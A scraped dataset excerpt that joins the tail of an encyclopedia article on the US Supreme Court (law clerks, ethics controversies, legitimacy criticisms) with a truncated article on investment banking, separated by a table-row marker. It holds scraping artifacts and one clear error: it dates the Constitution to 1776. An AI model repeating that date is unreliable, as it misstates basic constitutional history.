court-packing plan discussed above). Congress can pass legislation that restricts the jurisdiction of the Supreme Court and other federal courts over certain topics and cases: this is suggested by language in Section 2 of Article Three, where the appellate jurisdiction is granted "with such Exceptions, and under such Regulations as the Congress shall make. The court sanctioned such congressional action in the Reconstruction Era case ex parte McCardle (1869), although it rejected Congress' power to dictate how particular cases must be decided in United States v. Klein (1871). 236 On the other hand, tone through its power of judicial review, the Supreme Court has defined the scope and nature of the powers and separation between the legislative and executive branches of the federal government; for example, in United States v. Curtiss-Wright Export Corp. (1936), Dames Moore v. Regan (1981), and notably in Goldwater v. Carter (1979), which effectively gave the presidency the power to terminate ratified treaties without the consent of Congress. The court's decisions can also impose limitations on the scope of Executive authority, as in Humphrey's Executor v. United States (1935), the Steel Seizure Case (1952), and United States v. Nixon (1974). citation needed Each Supreme Court justice hires several law clerks to review petitions for writ of certiorari, research them, prepare bench memorandums, and draft opinions. Associate justices are allowed four clerks. The chief justice is allowed five clerks, but Chief Justice Rehnquist hired only three per year, and Chief Justice Roberts usually hires only four. 237 Generally, law clerks serve a term of one to two years. The first law clerk was hired by Associate Justice Horace Gray in 1882. 237 238 Oliver Wendell Holmes Jr. and Louis Brandeis were the first Supreme Court justices to use recent law school graduates as clerks, rather than hiring "a stenographer-secretary. 239 Most law clerks are recent law school graduates. The first female clerk was Lucile Lomen, hired in 1944 by Justice William O. Douglas. 237 The first African-American, William T. Coleman Jr., was hired in 1948 by Justice Felix Frankfurter. 237 A disproportionately large number of law clerks have obtained law degrees from elite law schools, especially Harvard, Yale, the University of Chicago, Columbia, and Stanford. From 1882 to 1940, 62% of law clerks were graduates of Harvard Law School. 237 Those chosen to be Supreme Court law clerks usually have graduated in the top of their law school class and were often an editor of the law review or a member of the moot court board. By the mid 1970s, clerking previously for a judge in a federal court of appeals had also become a prerequisite to clerking for a Supreme Court justice. Ten Supreme Court justices previously clerked for other justices: Byron White for Frederick M. Vinson, John Paul Stevens for Wiley Rutledge, William Rehnquist for Robert H. Jackson, Stephen Breyer for Arthur Goldberg, John Roberts for William Rehnquist, Elena Kagan for Thurgood Marshall, Neil Gorsuch for both Byron White and Anthony Kennedy, Brett Kavanaugh also for Kennedy, Amy Coney Barrett for Antonin Scalia, and Ketanji Brown Jackson for Stephen Breyer. Justices Gorsuch and Kavanaugh served under Kennedy during the same term. Gorsuch is the first justice to clerk for and subsequently serve alongside the same justice, serving alongside Kennedy from April 2017 through Kennedy's retirement in 2018. With the confirmation of Justice Kavanaugh, for the first time a majority of the Supreme Court was composed of former Supreme Court law clerks (Roberts, Breyer, Kagan, Gorsuch and Kavanaugh, now joined by Barrett and Jackson). Several current Supreme Court justices have also clerked in the federal courts of appeals: John Roberts for Judge Henry Friendly of the United States Court of Appeals for the Second Circuit, Justice Samuel Alito for Judge Leonard I. Garth of the United States Court of Appeals for the Third Circuit, Elena Kagan for Judge Abner J. Mikva of the United States Court of Appeals for the District of Columbia Circuit, Neil Gorsuch for Judge David B. Sentelle of the United States Court of Appeals for the District of Columbia, Brett Kavanaugh for Judge Walter Stapleton of the United States Court of Appeals for the Third Circuit and Judge Alex Kozinski of the United States Court of Appeals for the Ninth Circuit, and Amy Coney Barrett for Judge Laurence Silberman of the U.S. Court of Appeals for the D.C. Circuit. Clerks hired by each of the justices of the Supreme Court are often given considerable leeway in the opinions they draft. "Supreme Court clerkship appeared to be a nonpartisan institution from the 1940s into the 1980s, according to a study published in 2009 by the law review of Vanderbilt University Law School. 240 241 "As law has moved closer to mere politics, political affiliations have naturally and predictably become proxies for the different political agendas that have been pressed in and through the courts, former federal court of appeals judge J. Michael Luttig said. 240 David J. Garrow, professor of history at the University of Cambridge, stated that the court had thus begun to mirror the political branches of government. "We are getting a composition of the clerk workforce that is getting to be like the House of Representatives, Professor Garrow said. "Each side is putting forward only ideological purists. 240 According to the Vanderbilt Law Review study, this politicized hiring trend reinforces the impression that the Supreme Court is "a superlegislature responding to ideological arguments rather than a legal institution responding to concerns grounded in the rule of law. 240 The following are some of the criticisms and controversies about the Court that are not discussed in previous sections. Unlike in most high courts, the United States Supreme Court has lifetime tenure, an unusual amount of power over elected branches of government, and a difficult constitution to amend. 242 These, among other factors, have been attributed by some critics to the Court's diminished stature abroad 243 and lower approval ratings at home, which have dropped from the mid 60s in the late 1980s to around 40% in the early 2020s. Additional factors cited by critics include the polarization of national politics, ethics scandals, and specific controversial partisan rulings, including the relaxation of campaign finance rules, 244 increased gerrymandering, 245 weakened voting rights, 246 Dobbs v. Jackson and Bush v. Gore. 247 The continued consolidation of power by the court and, as a result of its rulings, the Republican Party, has sparked debate over when democratic backsliding becomes entrenched single-party rule. 247 Public trust in the court peaked in the late 1980s. Since the 2022 Dobbs ruling that overturned Roe v. Wade and permitted states to restrict abortion rights, Democrats and independents have increasingly lost trust in the court, seen the court as political, and expressed support for reforming the institution. 248 Historically, the court had relatively more trust than other government institutions. 249 After recording recent high approval ratings in the late 1980s around 66% approval, 250 the court's ratings have declined to an average of around 40% between mid 2021 and February 2024. 251 The electoral college (which elects the President who nominates the justices) and the U.S. Senate which confirms the justices, have selection biases that favor rural states that tend to vote Republican, resulting in a conservative Supreme Court. 252 Ziblatt and Levitsky estimate that 3 or 4 of the seats held by conservative justices on the court would be held by justices appointed by a Democratic president if the Presidency and Senate were selected directly by the popular vote. 253 The three Trump appointees to the court were all nominated by a president who finished second in the popular vote and confirmed by Senators representing a minority of Americans. 254 In addition, Clarence Thomas' confirmation in 1991 and Merrick Garland's blocked confirmation in 2016 were both decided by senators representing a minority of Americans. 255 Greg Price also critiqued the Court as minority rule. 256 Moreover, the Federalist Society acted as a filter for judicial nominations during the Trump administration, 257 ensuring the latest conservative justices lean even further to the right. 252 86% of judges Trump appointed to circuit courts and the Supreme Court were Federalist Society members. 258 David Litt critiques it as "an attempt to impose rigid ideological dogma on a profession once known for intellectual freedom. 259 Kate Aronoff criticizes the donations from special interests like fossil fuel companies and other dark money groups to the Federalist Society and related organizations seeking to influence lawyers and Supreme Court Justices. 260 The 2016 stonewalling of Merrick Garland's confirmation and subsequent filling with Neil Gorsuch has been critiqued as a 'stolen seat' citing precedent from the 20th century of confirmations during election years, 261 262 while proponents cited three blocked nominations between 1844 and 1866. 263 In recent years, Democrats have accused Republican leaders such as Mitch McConnell of hypocrisy, as they were instrumental in blocking the nomination of Merrick, but then rushing through the appointment of Amy Coney Barrett, even though both vacancies occurred close to an election. 264 Ethical controversies have grown with reports of justices (and their close family members) accepting expensive gifts, travel, business deals, and speaking fees without oversight or recusals from cases that present conflicts of interest. 265 266 267 268 269 270 271 Spousal income and connections to cases has been redacted from the Justices' ethical disclosure forms 272 while justices, such as Samuel Alito and Clarence Thomas, failed to disclose many large financial gifts including free vacations valued at as much as $500,000. 273 274 In 2024, Justices Alito and Thomas refused calls to recuse themselves from January 6th cases where their spouses have taken public stances or been involved in efforts to overturn the election. 275 276 277 278 The criticism intensified after the 2024 Trump v. United States decision granted broad immunity to presidents, with Representative Alexandria Ocasio-Cortez saying she would introduce impeachment articles when Congress is back in session. 279 On July 10, 2024, she filed Articles of Impeachment against Thomas and Alito, citing their "widely documented financial and personal entanglements. 280 281 282 283 As of late July, 2024, nearly 1.4 million people had signed a moveon.org petition asking Congress to remove Justice Thomas. 284 285 President Biden proposed term limits for justices, an enforceable ethics code, and elimination of "immunity for crimes a former president committed while in office". 286 287 288 Yale professor of constitutional law Akhil Reed Amar wrote an op-ed for The Atlantic titled Something Has Gone Deeply Wrong at the Supreme Court. 289 Other criticisms of the Court include weakening corruption laws impacting branches beyond the judiciary 290 291 and citing falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 Allison Orr Larsen, Associate Dean at William Mary Law School, wrote in Politico that the court should address this by requiring disclosure of all funders of amicus briefs and the studies they cite, only admit briefs that stay within the expertise of the authors (as is required in lower courts), and require the briefs to be submitted much earlier in the process so the history and facts have time to be challenged and uncovered. 209 The Supreme Court Historical Society's controversies include fundraising done by the Justices from corporations and wealthy donors apparently seeking access to the justices. 292 293 294 295 On November 13, 2023, the court issued its first-ever Code of Conduct for Justices of the Supreme Court of the United States to set "ethics rules and principles that guide the conduct of the Members of the Court. 296 297 The Code has been received by some as a significant first step 298 but does not address the ethics concerns of many notable critics who found the Code was a significantly weakened version of the rules for other federal judges, let alone the legislature and the executive branch, while also lacking an enforcement mechanism. 299 300 301 The Code's commentary denied past wrongdoing by saying that the Justices have largely abided by these principles and are simply publishing them now. 302 303 304 This has prompted some criticism that the court hopes to legitimize past and future scandals through this Code. 305 306 The ethics rules guiding the justices are set and enforced by the justices themselves, meaning the members of the court have no external checks on their behavior other than the impeachment of a justice by Congress. 307 308 Chief Justice Roberts refused to testify before the Senate Judiciary Committee in April 2023, reasserting his desire for the Supreme Court to continue to monitor itself despite mounting ethics scandals. 309 Lower courts, by contrast, discipline according to the 1973 Code of Conduct for U.S. judges which is enforced by the Judicial Conduct and Disability Act of 1980. 307 Article III, Section I of the Constitution of the United States (1776) establishes that the justices hold their office during good behavior. Thus far only one justice (Associate Justice Samuel Chase in 1804) has ever been impeached, and none has ever been removed from office. 310 The lack of external enforcement of ethics or other conduct violations makes the Supreme Court an outlier in modern organizational best-practices. 307 2024 reform legislation has been blocked by congressional Republicans. 278 Thomas Keck argues that because the Court has historically not served as a strong bulwark for democracy, the Roberts Court has the opportunity to go down in history as a defender of democracy. However, he believes that if the court shields Trump from criminal prosecution (after ensuring his access to the ballot), then the risks that come with an anti-democratic status-quo of the current court will outweigh the dangers that come from court reform (including court packing). 311 Aziz Z. Huq points to the blocking progress of democratizing institutions, increasing the disparity in wealth and power, and empowering an authoritarian white nationalist movement as evidence that the Supreme Court has created a "permanent minority" incapable of being defeated democratically. 312 Slate published an op-ed on July 3, 2024, by Dahlia Lithwick and Mark Joseph Stern criticizing several recent decisions, stating: The Supreme Court's conservative supermajority has, in recent weeks, restructured American democracy in the Republican Party's preferred image, fundamentally altering the balance of power between the branches and the citizens themselves.... In the course of its most recent term that conservative supermajority has created a monarchical presidency, awarding the chief executive near-insurmountable immunity from accountability for any and all crimes committed during a term in office. It has seized power from Congress, strictly limiting lawmakers' ability to write broad laws that tackle the major crises of the moment. And it has hobbled federal agencies' authority to apply existing statutes to problems on the ground, substituting the expert opinions of civil servants with the (often partisan) preferences of unelected judges. All the while, the court has placed itself at the apex of the state, agreeing to share power only with a strongman president who seeks to govern in line with the conservative justices' vision. 313 Some of the most notable historical decisions that were criticized for failing to protect individual rights include the Dred Scott (1857) decision that said people of African descent could not be U.S. citizens or enjoy constitutionally protected rights and privileges, 314 Plessy v. Ferguson (1896) that upheld segregation under the doctrine of separate but equal, 315 the Civil Rights Cases (1883) and Slaughter-House Cases (1873) that all but undermined civil rights legislation enacted during the Reconstruction era. 316 However, others argue that the court is too protective of some individual rights, particularly those of people accused of crimes or in detention. For example, Chief Justice Warren Burger criticized the exclusionary rule, and Justice Scalia criticized Boumediene v. Bush for being too protective of the rights of Guantanamo detainees, arguing habeas corpus should be limited to sovereign territory. 317 After Dobbs v. Jackson Women's Health Organization overturned nearly 50 years of precedent set by Roe v. Wade, some experts expressed concern that this may be the beginning of a rollback of individual rights that had been previously established under the substantive due process principle, in part because Justice Clarence Thomas wrote in his concurring opinion in Dobbs that the decision should prompt the court to reconsider all of the court's past substantive due process decisions. 318 Due process rights claimed to be at risk are: 318 Some experts such as Melissa Murray, law professor at N.Y.U. School of Law, have claimed that protections for interracial marriage, established in Loving v. Virginia (1967), may also be at risk. 319 Other experts such as Josh Blackman, law professor at South Texas College of Law Houston, argued that Loving actually relied more heavily upon Equal Protection Clause grounds than substantive due process. 320 Substantive due process has also been the primary vehicle used by the Supreme Court to incorporate the Bill of Rights against state and local governments. 321 Clarence Thomas referred to it as 'legal fiction, 322 preferring the Privileges or Immunities Clause for incorporating the Bill of Rights. 323 However, outside of Neil Gorsuch's commentary in Timbs v. Indiana, Thomas has received little support for this viewpoint. 324 better source needed The Supreme Court has been criticized for engaging in judicial activism. This criticism is leveled by those who believe the court should not interpret the law in any way besides through the lens of past precedent or Textualism. However, those on both sides of the political aisle often level this accusation at the court. The debate around judicial activism typically involves accusing the other side of activism, whilst denying that your own side engages in it. 325 326 Conservatives often cite the decision in Roe v. Wade (1973) as an example of liberal judicial activism. In its decision, the court legalized abortion on the basis of a "right to privacy" that they found inherent in the Due Process Clause of the Fourteenth Amendment. 327 Roe v. Wade was overturned nearly fifty years later by Dobbs v. Jackson (2022), ending the recognition of abortion access as a constitutional right and returning the issue of abortion back to the states. David Litt criticized the decision in Dobbs as activism on the part of the court's conservative majority because the court failed to respect past precedent, eschewing the principle of Stare decisis that usually guides the court's decisions. 328 The decision in Brown v. Board of Education, which banned racial segregation in public schools was also criticized as activist by conservatives Pat Buchanan, 329 Robert Bork 330 and Barry Goldwater. 331 More recently, Citizens United v. Federal Election Commission was criticized for expanding upon the precedent in First National Bank of Boston v. Bellotti (1978) that the First Amendment applies to corporations. 332 Foreign Policy writer Colm Quinn says that a criticism leveled at the court, as well as other American institutions, is that after two centuries they are beginning to look their age. He cites four features of the United States Supreme Court that make it different from high courts in other countries, and help explain why polarization is an issue in the United States court: 333 Adam Liptak wrote in 2008 that the court has declined in relevance in other constitutional courts. He cites factors like American exceptionalism, the relatively few updates to the constitution or the courts, the rightward shift of the court and the diminished stature of the United States abroad. 243 Michael Waldman argued that no other country gives its Supreme Court as much power. 334 Warren E. Burger, before becoming Chief Justice, argued that since the Supreme Court has such "unreviewable power", it is likely to "self-indulge itself", and unlikely to "engage in dispassionate analysis. 335 Larry Sabato wrote that the federal courts, and especially the Supreme Court, have excessive power. 100 Suja A. Thomas argues the Supreme Court has taken most of the constitutionally-defined power from juries in the United States for itself 336 thanks in part to the influence of legal elites and companies that prefer judges over juries 337 as well as the inability of the jury to defend its power. 338 Some members of Congress considered the results from the 2021 2022 term a shift of government power into the Supreme Court, and a "judicial coup". 339 The 2021 2022 term of the court was the first full term following the appointment of three judges by Republican president Donald Trump — Neil Gorsuch, Brett Kavanaugh, and Amy Coney Barrett — which created a six-strong conservative majority on the court. Subsequently, at the end of the term, the court issued a number of decisions that favored this conservative majority while significantly changing the landscape with respect to rights. These included Dobbs v. Jackson Women's Health Organization which overturned Roe v. Wade and Planned Parenthood v. Casey in recognizing abortion is not a constitutional right, New York State Rifle Pistol Association, Inc. v. Bruen which made public possession of guns a protected right under the Second Amendment, Carson v. Makin and Kennedy v. Bremerton School District which both weakened the Establishment Clause separating church and state, and West Virginia v. EPA which weakened the power of executive branch agencies to interpret their congressional mandate. 340 341 342 There has been debate throughout American history about the boundary between federal and state power. While Framers such as James Madison 343 and Alexander Hamilton 344 argued in The Federalist Papers that their then-proposed Constitution would not infringe on the power of state governments, 345 346 347 348 others argue that expansive federal power is good and consistent with the Framers' wishes. 349 The Tenth Amendment to the United States Constitution explicitly grants "powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people. The court has been criticized for giving the federal government too much power to interfere with state authority. citation needed One criticism is that it has allowed the federal government to misuse the Commerce Clause by upholding regulations and legislation which have little to do with interstate commerce, but that were enacted under the guise of regulating interstate commerce; and by voiding state legislation for allegedly interfering with interstate commerce. For example, the Commerce Clause was used by the Fifth Circuit Court of Appeals to uphold the Endangered Species Act, thus protecting six endemic species of insect near Austin, Texas, despite the fact that the insects had no commercial value and did not travel across state lines; the Supreme Court let that ruling stand without comment in 2005. 350 Chief Justice John Marshall asserted Congress's power over interstate commerce was "complete in itself, may be exercised to its utmost extent, and acknowledges no limitations, other than are prescribed in the Constitution. 351 Justice Alito said congressional authority under the Commerce Clause is "quite broad"; 352 modern-day theorist Robert B. Reich suggests debate over the Commerce Clause continues today. 351 Advocates of states' rights, such as constitutional scholar Kevin Gutzman, have also criticized the court, saying it has misused the Fourteenth Amendment to undermine state authority. Justice Brandeis, in arguing for allowing the states to operate without federal interference, suggested that states should be laboratories of democracy. 353 One critic wrote "the great majority of Supreme Court rulings of unconstitutionality involve state, not federal, law. 354 Others see the Fourteenth Amendment as a positive force that extends "protection of those rights and guarantees to the state level. 355 More recently, in Gamble v. United States, the Court examined the doctrine of "separate sovereigns", whereby a criminal defendant can be prosecuted in state court as well as federal court on separate charges for the same offense. 356 357 Some Court decisions have been criticized for injecting the court into the political arena, and deciding questions that are the purview of the elected branches of government. The Bush v. Gore decision, in which the Supreme Court intervened in the 2000 presidential election, awarding George W. Bush the presidency over Al Gore, received scrutiny as political based on the controversial justifications used by the five conservative justices to elevate a fellow conservative to the presidency. 358 359 360 361 362 The court has been criticized for keeping its deliberations hidden from public view. 363 364 For example, the increasing use of a 'shadow docket' facilitates the court making decisions in secret without knowing how each Justice came to their decision. 365 366 In 2024, after comparing the analysis of shadow-docket decisions to Kremlinology, Matt Ford called this trend of secrecy "increasingly troubling", arguing the court's power comes entirely from persuasion and explanation. 367 A 2007 review of Jeffrey Toobin's book compared the Court to a cartel where its inner-workings are mostly unknown, arguing this lack of transparency reduces scrutiny which hurts ordinary Americans who know little about the nine extremely consequential Justices. 358 A 2010 poll found that 61% of American voters agreed that televising Court hearings would "be good for democracy", and 50% of voters stated they would watch Court proceedings if they were televised. 368 369 Ian Millhiser of Vox speculates that the decades-long decline in cases heard could be due to the increasing political makeup of judges, that he says might be more interested in settling political disputes than legal ones. 370 British constitutional scholar Adam Tomkins sees flaws in the American system of having courts (and specifically the Supreme Court) act as checks on the Executive and Legislative branches; he argues that because the courts must wait, sometimes for years, for cases to navigate their way through the system, their ability to restrain other branches is severely weakened. 371 372 In contrast, various other countries have a dedicated constitutional court that has original jurisdiction on constitutional claims brought by persons or political institutions; for example, the Federal Constitutional Court of Germany, which can declare a law unconstitutional when challenged. Critics have accused the Court of "slow-walking" important cases relating to former President Donald Trump in order to benefit his election chances in the face of the 2024 United States presidential election. 373 The Court is considering a Presidential immunity claim as part of the Federal prosecution of Donald Trump (election obstruction case). Critics argue that the Court has acted slowly in order to delay this case until after the election. They point out that the Court can move quickly when it wants to, as it did when it disregarded typical procedures in Bush v. Gore, granting the petition on a Saturday, receiving briefs on Sunday, holding oral arguments on Monday, and issuing the final opinion on Tuesday. 373 Author Sonja West, of Slate, argues that the Federal prosecution of Donald Trump (election obstruction case) is of similar importance to Bush v. Gore and should therefore be treated as expeditiously, but the Court seems to be taking the opposite approach. 373 Sometimes draft opinions are deliberately leaked or inadvertently released before they are published. Such releases are often purported to harm the court's reputation. 374 Chief Justice Roberts has previously described leaks as an "egregious breach of trust" that "undermine the integrity of our operations" in reference to the leaked draft opinion for Dobbs v. Jackson Women's Health Organization. 375 In addition to leaks, the Court has sometimes mistakenly released opinions before they are ready to be published. On June 26, 2024, the Court inadvertently posted an opinion for Moyle v. United States to its website that seemed to indicate that the court will temporarily allow abortions in medical emergencies in Idaho. 376 The official opinion was posted the next day, which returned the case to the lower courts without a ruling on the merits. |
216 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Investment_banking | Investment banking is an advisory-based financial service for institutional investors, corporations, governments, and similar clients. Traditionally associated with corporate finance, such a bank might assist in raising financial capital by underwriting or acting as the client's agent in the issuance of debt or equity securities. An investment bank may also assist companies involved in mergers and acquisitions (M A) and provide ancillary services such as market making, trading of derivatives and equity securities, FICC services (fixed income instruments, currencies, and commodities) or research (macroeconomic, credit or equity research). Most investment banks maintain prime brokerage and asset management departments in conjunction with their investment research businesses. As an industry, it is broken up into the Bulge Bracket (upper tier), Middle Market (mid-level businesses), and boutique market (specialized businesses). Unlike commercial banks and retail banks, investment banks do not take deposits. The revenue model of an investment bank comes mostly from the collection of fees for advising on a transaction, contrary to a commercial or retail bank. From the passage of Glass Steagall Act in 1933 until its repeal in 1999 by the Gramm Leach Bliley Act, the United States maintained a separation between investment banking and commercial banks. Other industrialized countries, including G7 countries, have historically not maintained such a separation. As part of the Dodd Frank Wall Street Reform and Consumer Protection Act of 2010 (Dodd Frank Act of 2010), the Volcker Rule asserts some institutional separation of investment banking services from commercial banking. 1 All investment banking activity is classed as either "sell side" or "buy side". The "sell side" involves trading securities for cash or for other securities (e.g. facilitating transactions, market-making), or the promotion of securities (e.g. underwriting, research, etc.). The "buy side" involves the provision of advice to institutions that buy investment services. Private equity funds, mutual funds, life insurance companies, unit trusts, and hedge funds are the most common types of buy-side entities. An investment bank can also be split into private and public functions with a screen separating the two to prevent information from crossing. The private areas of the bank deal with private insider information that may not be publicly disclosed, while the public areas, such as stock analysis, deal with public information. An advisor who provides investment banking services in the United States must be a licensed broker-dealer and subject to U.S. Securities and Exchange Commission (SEC) and Financial Industry Regulatory Authority (FINRA) regulation. 2 The Dutch East India Company was the first company to issue bonds and shares of stock to the general public. It was also the first publicly traded company, being the first company to be listed on an official stock exchange. 3 4 Investment banking has changed over the years, beginning as a partnership firm focused on underwriting security issuance, i.e. initial public offerings (IPOs) and secondary market offerings, brokerage, and mergers and acquisitions, and evolving into a "full-service" range including securities research, proprietary trading, and investment management. 5 In the 21st century, the SEC filings of the major independent investment banks such as Goldman Sachs and Morgan Stanley reflect three product segments: In the United States, commercial banking and investment banking were separated by the Glass Steagall Act, which was repealed in 1999. The repeal led to more "universal banks" offering an even greater range of services. Many large commercial banks have therefore developed investment banking divisions through acquisitions and hiring. Notable full-service investment banks with a significant investment banking division (IBD) include JPMorgan Chase, Bank of America, Citigroup, Deutsche Bank, UBS (Acquired Credit Suisse), and Barclays. After the financial crisis of 2007 08 and the subsequent passage of the Dodd-Frank Act of 2010, regulations have limited certain investment banking operations, notably with the Volcker Rule's restrictions on proprietary trading. 7 The traditional service of underwriting security issues has declined as a percentage of revenue. As far back as 1960, 70% of Merrill Lynch's revenue was derived from transaction commissions while "traditional investment banking" services accounted for 5%. However, Merrill Lynch was a relatively "retail-focused" firm with a large brokerage network. 7 Investment banking is split into front office, middle office, and back office activities. While large service investment banks offer all lines of business, both "sell side" and "buy side", smaller sell-side advisory firms such as boutique investment banks and small broker-dealers focus on niche segments within investment banking and sales trading research, respectively. For example, Evercore (NYSE:EVR) acquired ISI International Strategy Investment (ISI) in 2014 to expand their revenue into research-driven equity sales and trading. 8 Investment banks offer services to both corporations issuing securities and investors buying securities. For corporations, investment bankers offer information on when and how to place their securities on the open market, a highly regulated process by the SEC to ensure transparency is provided to investors. Therefore, investment bankers play a very important role in issuing new security offerings. 7 9 Front office is generally described as a revenue-generating role. There are two main areas within front office: investment banking and markets. 10 Corporate finance is the aspect of investment banks which involves helping customers raise funds in capital markets and giving advice on mergers and acquisitions (M A); 12 transactions in which capital is raised for the corporation include those listed aside. 12 This work may involve, i.a., subscribing investors to a security issuance, coordinating with bidders, or negotiating with a merger target. A pitch book, also called a confidential information memorandum (CIM), is a document that highlights the relevant financial information, past transaction experience, and background of the deal team to market the bank to a potential M A client; if the pitch is successful, the bank arranges the deal for the client. 13 Recent legal and regulatory developments in the U.S. will likely alter the makeup of the group of arrangers and financiers willing to arrange and provide financing for certain highly leveraged transactions. 14 15 On behalf of the bank and its clients, a large investment bank's primary function is buying and selling products. 16 Sales is the term for the investment bank's sales force, whose primary job is to call on institutional and high-net-worth investors to suggest trading ideas (on a caveat emptor basis) and take orders. Sales desks then communicate their clients' orders to the appropriate trading rooms, which can price and execute trades, or structure new products that fit a specific need. Sales make deals tailored to their corporate customers' needs, that is, their terms are often specific. Focusing on their customer relationship, they may deal on the whole range of asset types. (In distinction, trades negotiated by market-makers usually bear standard terms; in market making, traders will buy and sell financial products with the goal of making money on each trade. See under trading desk.) Structuring has been a relatively recent activity as derivatives have come into play, with highly technical and numerate employees working on creating complex structured products which typically offer much greater margins and returns than underlying cash securities, so-called "yield enhancement". In 2010, investment banks came under pressure as a result of selling complex derivatives contracts to local municipalities in Europe and the US. 17 Strategists advise external as well as internal clients on the strategies that can be adopted in various markets. Ranging from derivatives to specific industries, strategists place companies and industries in a quantitative framework with full consideration of the macroeconomic scene. This strategy often affects the way the firm will operate in the market, the direction it would like to take in terms of its proprietary and flow positions, the suggestions salespersons give to clients, as well as the way structurers create new products. Banks also undertake risk through proprietary trading, performed by a special set of traders who do not interface with clients and through "principal risk"—risk undertaken by a trader after he buys or sells a product to a client and does not hedge his total exposure. Here, and in general, banks seek to maximize profitability for a given amount of risk on their balance sheet. Note here that the FRTB framework has underscored the distinction between the "Trading book" and the "Banking book" - i.e. assets intended for active trading, as opposed to assets expected to be held to maturity - and market risk capital requirements will differ accordingly. The necessity for numerical ability in sales and trading has created jobs for physics, computer science, mathematics, and engineering PhDs who act as "front office" quantitative analysts. The securities research division reviews companies and writes reports about their prospects, often with "buy", "hold", or "sell" ratings. Investment banks typically have sell-side analysts which cover various industries. Their sponsored funds or proprietary trading offices will also have buy-side research. Research also covers credit risk, fixed income, macroeconomics, and quantitative analysis, all of which are used internally and externally to advise clients; alongside "Equity", these may be separate "groups". The research group(s) typically provide a key service in terms of advisory and strategy. While the research division may or may not generate revenue (based on the specific compliance policies at different banks), its resources are used to assist traders in trading, the sales force in suggesting ideas to customers, and investment bankers by covering their clients. 18 Research also serves outside clients with investment advice (such as institutional investors and high-net-worth individuals) in the hopes that these clients will execute suggested trade ideas through the sales and trading division of the bank, and thereby generate revenue for the firm. With MiFID II requiring sell-side research teams in banks to charge for research, the business model for research is increasingly becoming revenue-generating. External rankings of researchers are becoming increasingly important, and banks have started the process of monetizing research publications, client interaction times, meetings with clients etc. There is a potential conflict of interest between the investment bank and its analysis, in that published analysis can impact the performance of a security (in the secondary markets or an initial public offering) or influence the relationship between the banker and its corporate clients, and vice versa regarding material non-public information (MNPI), thereby affecting the bank's profitability. 19 See also Chinese wall Finance. This area of the bank includes treasury management, internal controls (such as Risk), and internal corporate strategy. Corporate treasury is responsible for an investment bank's funding, capital structure management, and liquidity risk monitoring; it is (co)responsible for the bank's funds transfer pricing (FTP) framework. Internal control tracks and analyzes the capital flows of the firm, the finance division is the principal adviser to senior management on essential areas such as controlling the firm's global risk exposure and the profitability and structure of the firm's various businesses via dedicated trading desk product control teams. In the United States and United Kingdom, a comptroller (or financial controller) is a senior position, often reporting to the chief financial officer. Risk management involves analyzing the market and credit risk that an investment bank or its clients take onto their balance sheet during transactions or trades. Middle office "Credit Risk" focuses around capital markets activities, such as syndicated loans, bond issuance, restructuring, and leveraged finance. These are not considered "front office" as they tend not to be client-facing and rather 'control' banking functions from taking too much risk. "Market Risk" is the control function for the Markets' business and conducts review of sales and trading activities utilizing the VaR model. Other Middle office "Risk Groups" include country risk, operational risk, and counterparty risks which may or may not exist on a bank to bank basis. Front office risk teams, on the other hand, engage in revenue-generating activities involving debt structuring, restructuring, syndicated loans, and securitization for clients such as corporates, governments, and hedge funds. Here "Credit Risk Solutions", are a key part of capital market transactions, involving debt structuring, exit financing, loan amendment, project finance, leveraged buy-outs, and sometimes portfolio hedging. The "Market Risk Team" provides services to investors via derivative solutions, portfolio management, portfolio consulting, and risk advisory. Well-known "Risk Groups" are at JPMorgan Chase, Morgan Stanley, Goldman Sachs and Barclays. J.P. Morgan IB Risk works with investment banking to execute transactions and advise investors, although its Finance Operation risk groups focus on middle office functions involving internal, non-revenue generating, operational risk controls. 20 21 22 The credit default swap, for instance, is a famous credit risk hedging solution for clients invented by J.P. Morgan's Blythe Masters during the 1990s. The Loan Risk Solutions group 23 within Barclays' investment banking division and Risk Management and Financing group 24 housed in Goldman Sach's securities division are client-driven franchises. Risk management groups such as credit risk, operational risk, internal risk control, and legal risk are restrained to internal business functions — including firm balance-sheet risk analysis and assigning the trading cap — that are independent of client needs, even though these groups may be responsible for deal approval that directly affects capital market activities. Similarly, the Internal corporate strategy group, tackling firm management and profit strategy, unlike corporate strategy groups that advise clients, is non-revenue regenerating yet a key functional role within investment banks. This list is not a comprehensive summary of all middle-office functions within an investment bank, as specific desks within front and back offices may participate in internal functions. 25 The back office data-checks trades that have been conducted, ensuring that they are not wrong, and transacts the required transfers. Many banks have outsourced operations. It is, however, a critical part of the bank. citation needed Every major investment bank has considerable amounts of in-house software, created by the technology team, who are also responsible for technical support. Technology has changed considerably in the last few years as more sales and trading desks are using electronic processing. Some trades are initiated by complex algorithms for hedging purposes. Firms are responsible for compliance with local and foreign government regulations and internal regulations. The investment banking industry can be broken up into Bulge Bracket (upper tier), Middle Market (mid-level businesses), and boutique market (specialized businesses) categories. There are various trade associations throughout the world which represent the industry in lobbying, facilitate industry standards, and publish statistics. The International Council of Securities Associations (ICSA) is a global group of trade associations. In the United States, the Securities Industry and Financial Markets Association (SIFMA) is likely the most significant; however, several of the large investment banks are members of the American Bankers Association Securities Association (ABASA), 27 while small investment banks are members of the National Investment Banking Association (NIBA). In Europe, the European Forum of Securities Associations was formed in 2007 by various European trade associations. 28 Several European trade associations (principally the London Investment Banking Association and the European SIFMA affiliate) combined in November 2009 to form the Association for Financial Markets in Europe (AFME). 29 In the securities industry in China, the Securities Association of China is a self-regulatory organization whose members are largely investment banks. Global investment banking revenue increased for the fifth year running in 2007, to a record US$84 billion, which was up 22% on the previous year and more than double the level in 2003. 30 Subsequent to their exposure to United States sub-prime securities investments, many investment banks have experienced losses. As of late 2012, global revenues for investment banks were estimated at $240 billion, down about a third from 2009, as companies pursued less deals and traded less. 31 Differences in total revenue are likely due to different ways of classifying investment banking revenue, such as subtracting proprietary trading revenue. In terms of total revenue, SEC filings of the major independent investment banks in the United States show that investment banking (defined as M A advisory services and security underwriting) made up only about 15 20% of total revenue for these banks from 1996 to 2006, with the majority of revenue (60 in some years) brought in by "trading" which includes brokerage commissions and proprietary trading; the proprietary trading is estimated to provide a significant portion of this revenue. 6 The United States generated 46% of global revenue in 2009, down from 56% in 1999. Europe (with Middle East and Africa) generated about a third, while Asian countries generated the remaining 21%. 30 : 8 The industry is heavily concentrated in a small number of major financial centers, including New York City, City of London, 